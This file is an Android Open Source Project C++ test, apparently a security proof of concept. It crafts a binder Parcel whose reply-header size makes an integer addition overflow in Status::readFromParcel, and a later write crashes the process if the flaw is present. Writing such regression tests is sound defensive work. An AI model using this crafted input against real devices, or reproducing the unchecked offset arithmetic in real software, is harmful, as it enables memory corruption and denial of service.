/**
 * Copyright (C) 2020 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
#include <binder/Parcel.h>
#include <binder/Status.h>

using namespace android;
using ::android::binder::Status;

int main(void) {
    Parcel parcel;
    parcel.writeInt32(Status::EX_HAS_REPLY_HEADER);
    /** Vulerable Code: const int32_t header_start = parcel.dataPosition();
                        parcel.setDataPosition(header_start + header_size);
    Hence header_start is 4 [sizeof(int32_t)] as we have written
    Status::EX_HAS_REPLY_HEADER. header_start + header_size computation will
    overflow if header_size > INT32_MAX - sizeof(int32_t).
    */
    parcel.writeInt32(INT32_MAX - sizeof(int32_t));
    parcel.setDataPosition(0);
    Status status;
    status.readFromParcel(parcel);
    /** If vulnerability is present, the parcel's data position would be very
        large. Hence any write to the parcel will trigger a SIGSEGV else the
        write would pass.
    */
    parcel.writeInt32(0);
    return EXIT_SUCCESS;
}